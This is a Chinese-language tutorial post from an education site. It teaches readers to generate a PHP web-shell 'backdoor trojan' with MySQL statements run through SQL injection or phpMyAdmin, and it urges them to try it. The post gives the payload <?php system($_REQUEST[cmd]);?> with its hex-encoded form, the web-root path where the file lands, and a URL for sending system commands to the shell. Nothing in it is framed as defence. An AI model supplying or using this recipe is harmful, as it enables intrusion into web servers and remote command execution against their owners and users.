怎样通过Mysql的语句生成后门木马呢？

　　MySQL是一个多线程的，结构化查询语言(即SQL)数据库服务器。SQL在世界上是最流行的数据库语言。除此之外，MySQL运行速度十分快，执行性能十分高，并且还很容易使用，所以有不少的开发人员都会选用MySQL数据库。那么大家就跟着小编一起来学习：怎样通过Mysql的语句生成后门木马呢？

　　一、后门木马

　　大家知道什么叫做后门木马吗？应该有不少的朋友都不知道吧，那么现在小编就为大家简单的介绍一下吧。后门木马又称特洛伊木马，英文叫做"Trojanhorse"，它是一种基于远程控制的黑客工具。分为两大部分，即客户端和服务端。在黑客进行的各种攻击行为中，木马都起到了开路先锋的作用。

　　二、实现方法

　　问题就来了，我们怎样通过Mysql的语句生成后门木马呢？其实实现方法真的很简单，如果不相信就自己动手尝试一下吧。编程代码，如图所示：

　　我们仅仅需要通过Mysql的注入或者是在php my admin（phpMyAdmin是一个以PHP为基础，以Web-Base方式架构在网站主机上的MySQL的数据库管理工具，让管理者可用Web接口管理MySQL数据库。）中运行上面的编程代码就可以了。当我们操作成功以后，我们就会看到在C:/inetpub/wwwroot/这一个路径下面会自动生成一个名字叫做cmd.php的文件。大家可以发现这一个文件里面的内容就是原来的vbb_strikes内容,在其后面紧跟着下面的命令语句：23<?phpsystem($_REQUEST[cmd]);?>

　　然后我们只需要通过http://www.xxx.com/cmd.php?cmd=dirc:\\这一个路径，就可以成功的执行系统DOS（DOS是英文DiskOperatingSystem的缩写，意思是“磁盘操作系统”。）命令!

　　有人就会问小编，那一串好像乱码的文字（即0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E）究竟是什么东西?

　　简单来说，其实这就是<?phpsystem($_REQUEST[cmd]);?>这一句编程代码的十六进制（计算机中数据的一种表示方法）编码了。假如说大家不使用这一种方法的话,那么就会有不一样的SQL版本会出现其它的编码。就比如说：%xx之类的编码,那这个后门就不可以继续执行下去了!假如说大家还有其它一些语名要弄,那么大家可以到UltraEdit（UltraEdit是Windows旗下一款流行的老牌文本/HEX编辑器(非开源)，可以编辑文本、十六进制、ASCII码。）中输入,然后点击按下键盘上[Ctrl+H]的组合键,把里面的十六进制通通连在一起即可!

　　小编结语：

　　以上是今天的编程语言的教程了，介绍了怎样通过Mysql的语句生成后门木马呢？希望这对你有所帮助。如果你也有这样的需要，那就赶快来学习一下吧。如果大家喜欢课课家教育的话，不妨可以推荐更多的朋友来哟！